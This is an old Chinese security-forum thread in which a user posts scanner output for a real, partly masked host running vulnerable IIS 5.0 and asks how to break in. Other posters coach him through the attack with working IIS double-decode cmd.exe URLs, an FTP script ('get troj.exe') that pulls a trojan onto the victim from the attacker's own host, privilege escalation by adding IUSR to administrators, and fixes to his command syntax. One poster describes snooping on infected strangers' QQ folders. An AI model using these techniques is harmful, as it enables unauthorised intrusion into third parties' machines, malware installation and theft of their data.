20CN网络安全小组论坛 - 菜鸟乐园 - 扫描到一台主机有如下漏洞，有何可利用之处，请指教。

论坛: 菜鸟乐园标题: 扫描到一台主机有如下漏洞，有何可利用之处，请指教。

作者: Bingo [bingogw]

论坛用户

开放端口:

主机218.15.***.***端口4650....开启().
主机218.15.***.***端口4359....开启().
主机218.15.***.***端口3372....开启().
主机218.15.***.***端口1720....开启().
主机218.15.***.***端口1026....开启().
主机218.15.***.***端口1025....开启().
主机218.15.***.***端口1002....开启().
主机218.15.***.***端口0443....开启().
主机218.15.***.***端口0389....开启().
主机218.15.***.***端口0139....开启().
主机218.15.***.***端口0135....开启().
主机218.15.***.***端口0080....开启().
主机218.15.***.***端口0025....开启().

SMTP-> 主机 218.15.***.*** VRFY ...支持
PLUGIN-> 扫描 218.15.***.*** IIS5.0 NULL.Printer Exploit ...成功
CGI-> 检测 218.15.***.*** /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir%20c:\ ...成功
CGI-> 检测 218.15.***.*** /scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\ ...成功
PORT-> 主机 218.15.***.*** 端口 0080 ...开放
PORT-> 主机 218.15.***.*** 端口 0025 ...开放
CGI-> 检测 218.15.***.*** /_vti_bin/shtml.dll/_vti_rpc ...成功
PORT-> 主机 218.15.***.*** 端口 0443 ...开放
PORT-> 主机 218.15.***.*** 端口 0139 ...开放
IIS-> 主机 218.15.***.*** IIS检测 FrontPage 扩展 ...成功
CGI-> 检测 218.15.***.*** /scripts/samples/search/simple.idq ...成功
CGI-> 检测 218.15.***.*** /scripts/samples/search/queryhit.idq ...成功
CGI-> 检测 218.15.***.*** /scripts/samples/search/query.idq ...成功
CGI-> 检测 218.15.***.*** /scripts/samples/search/qsumrhit.htw ...成功
CGI-> 检测 218.15.***.*** /scripts/samples/search/qfullhit.htw ...成功
CGI-> 检测 218.15.***.*** /scripts/samples/search/filetime.idq ...成功
CGI-> 检测 218.15.***.*** /scripts/samples/search/filesize.idq ...成功
CGI-> 检测 218.15.***.*** /scripts/samples/search/author.idq ...成功
IIS-> 主机 218.15.***.*** IIS Remote Execute-E ...成功
CGI-> 检测 218.15.***.*** /blabla.idq ...成功
CGI-> 检测 218.15.***.*** /abczxv.htw ...成功
CGI-> 检测 218.15.***.*** /_vti_pvt/doctodep.btr ...成功
CGI-> 检测 218.15.***.*** /_vti_inf.html ...成功
CGI-> 检测 218.15.***.*** /_vti_bin/shtml.exe ...成功
CGI-> 检测 218.15.***.*** /_vti_bin/shtml.dll/_vti_rpc ...成功
CGI-> 检测 218.15.***.*** /_vti_bin/shtml.dll ...成功
CGI-> 检测 218.15.***.*** /_vti_bin/fpcount.exe ...成功
CGI-> 检测 218.15.***.*** /?PageServices ...成功
CGI-> 检测 218.15.***.*** /*.idq ...成功
CGI-> 检测 218.15.***.*** /*.ida ...成功

地主发表时间: 07/17 11:04

回复: zjhacker [zjhacker]

论坛用户

哥们你用什么描的呀!

B1层发表时间: 07/17 11:05

回复: tabris17 [tabris17]

论坛用户

二次解码漏洞，可以一用
218.15.***.*** /scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\

B2层发表时间: 07/17 11:34

回复: apple [apple_1]

论坛用户

看不懂
什么意思

B3层发表时间: 07/17 12:27

回复: Bingo [bingogw]

论坛用户

我是用流光扫的。利用漏洞的第三项我可以进入对方的c盘，但好象不能下载里面的密码文件之类的，访问时只是显示文件的大小和更新日期之类的，请问如何把*.pwl文件下载下来？

B4层发表时间: 07/17 14:03

回复: tabris17 [tabris17]

论坛用户

用该漏洞用对方系统中的ftp.exe下载一个win2000下权限提升工具
把iusr_machinname加入administrator组

B5层发表时间: 07/17 15:38

回复: Bingo [bingogw]

论坛用户

不知道你说的win2000权限提升工具所指为何种工具？而且它并没有开放ftp服务。

B6层发表时间: 07/17 19:37

回复: tabris17 [tabris17]

论坛用户

不需要他开放ftp服务
你自己开个ftp服务
然后在他系统理执行ftp.exe就行

B7层发表时间: 07/17 20:52

回复: Bingo [bingogw]

论坛用户

我就是不知道怎样在它主机里执行文件啊？我访问.exe结尾的文件时，它只显示文件的有关信息而已，并不执行啊！

B8层发表时间: 07/18 00:01

回复: Bingo [bingogw]

论坛用户

我就是不知道怎样在它主机里执行文件啊？我访问.exe结尾的文件时，它只显示文件的有关信息而已，并不执行啊！

B9层发表时间: 07/18 00:04

回复: tabris17 [tabris17]

论坛用户

不会把
script目录有执行权限的
你是怎么运行的？
把URL贴出来

B10层发表时间: 07/18 10:18

回复: Bingo [bingogw]

论坛用户

我只执行了以下这段URL:http://218.15.***.*** /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir%20c:\能进入c盘，在c盘访问的时候就有我如上说所的现象。

B11层发表时间: 07/18 10:41

回复: tabris17 [tabris17]

论坛用户

写个bat文件执行试试

B12层发表时间: 07/18 10:44

回复: Bingo [bingogw]

论坛用户

Oh~~!!!No~~~!!!那些DOS下的批处理我都快忘得一干二净了，有没有现成的？

B13层发表时间: 07/18 12:58

回复: tabris17 [tabris17]

论坛用户

这是我以前写的，将就着看吧
---------------------------------------------------------------
写这篇文章的目的不是教大家怎么去破坏,只是想告诉那些认为自己是菜鸟的人:所谓的
那些"黑客"其实并不比你懂多少东西,也没有什么技术可言.
windows2000漏洞多多是众所周知的,但经过精心配置,大多数的漏洞还是可以避免的,所
以想找一台可利用的主机还是挺难.
不过现在,nimda等病毒肆虐,开着防火墙不时就收到这样的警报:
[12:02:16] 202.120.***.*** 试图连接本机的 Http[80] 端口，
TCP标志： S
该操作被拒绝。
不防就这样来个守株逮兔.
像上面的那个IP就是中了nimda的机子,先用telnet连接它的80端口试试,如果成功连接
的话,10有89能成功.利用二次解码漏洞,在IE地址栏键入
:http://202.120.***.***/scripts/..%252f..%252f..%252f..%252fwinnt/system32/c
md.exe?/c+dir,成功的话就能看到script目录了(但有一次我竟碰到一台apache(win32)
的主机),这台机子可任你为所欲为了,但最好别这样.
用一下url可在对方电脑里写文件
:http://202.120.***.***/scripts/..%252f..%252f..%252f..%252fwinnt/system32/c
md.exe?/c+echo+hello>hello.txt,可以写这样一个文件:
troj.txt:

binary
get troj.exe
bye

然后用如样的URL文件将放入对方主机 http://202.120.***.***/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cm
d.exe?/c+ftp+-s:troj.txt+-a+host
其实就这样简单.
破坏和窃取别人电脑里的数据是违法的,但我总忍不住好奇心,每次总是到program
file\tencent\目录下看看他的QQ号,然后用QQ告诉他:"你中了nimda".也算是做件好事
吧.(有一次竟发现一个人有7个QQ,有男有女,有北京的,有河南的,各式各样的都有,天那
!)

--

~~~~~~~~~~~~~~~~~~~~~~~~~~~~
God's in his Heaven,
All's Right with the World.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~

B14层发表时间: 07/18 13:05

回复: Bingo [bingogw]

论坛用户

我终于能进到它的c:\inetpub\scripts了，但里面没有什么可执行的，只有如下内容：
Directory of c:\inetpub\scripts

2002-07-12  11:36       <DIR>          .
2002-07-12  11:36       <DIR>          ..
2002-07-11  10:43                    0 TFTP1788
2002-07-11  10:41                    0 TFTP1792
2002-07-12  11:38              151,552 TFTP320
2002-07-11  10:39                    0 TFTP356
               4 File(s)        151,552 bytes
               2 Dir(s)   2,575,171,584 bytes free
而我也不能写文件： http://202.120.***.***/scripts/..%252f..%252f..%252f..%252fwinnt/system32/c
md.exe?/c+echo+hello>hello.txt,可以写这样一个文件:
troj.txt:

binary
get troj.exe
bye
那改这么办？

B15层发表时间: 07/19 13:52

回复: tabris17 [tabris17]

论坛用户

echo helo>a.txt(创建一个文件并写入)
echo hello>>a.txt(追加内容到已有文件)
写错了只能删掉重来，没办法的

B16层发表时间: 07/19 13:57

回复: Bingo [bingogw]

论坛用户

我按你所说的，在地址栏写： http://218.6.249.19/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+echo+hello>hello.txt
但浏览器说该页无法显示

B17层发表时间: 07/19 14:06

回复: tabris17 [tabris17]

论坛用户

奇怪
这种事没碰到过
可能iusr_machinename的权限被设置过了吧
无法写入

B18层发表时间: 07/19 14:30

回复: tabris17 [tabris17]

论坛用户

哦
不对
有写权限的
返回的是参数错误

B19层发表时间: 07/19 14:37

回复: laneagle [laneagle]

论坛用户

是+>+HELLO.TXT

B20层发表时间: 07/20 01:19

回复: Bingo [bingogw]

论坛用户

Thanks!!!那是建立文本吧，那怎样向文本里写内容呢？

B21层发表时间: 07/20 13:38

论坛: 菜鸟乐园